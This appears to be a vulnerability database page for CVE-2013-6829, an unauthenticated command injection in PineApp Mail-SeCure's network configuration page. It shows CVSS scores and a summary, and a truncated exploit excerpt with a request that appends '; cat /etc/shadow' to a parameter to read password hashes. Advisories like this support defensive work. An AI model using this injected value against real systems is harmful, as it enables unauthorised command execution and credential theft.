7.5
CVSSv2

CVE-2013-6829

Published: 20/11/2013 Updated: 21/11/2013
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

admin/confnetworking.html in PineApp Mail-SeCure allows remote malicious users to execute arbitrary commands via shell metacharacters in the pinghost parameter during a ping operation.

Vulnerable Product Search on Vulmon Subscribe to Product

pineapp mail-secure -

Exploits

----------------------------------------------------------------- It is possible execute any command bash as qmailq unprivilege user, sending only the following https request, without authentication 1921682424:7443/admin/confnetworkinghtml?cmd=nslookup&hostip=&nstype=any&nsserver=wwwgooglees;%20cat%20/etc/shadow To uploa ...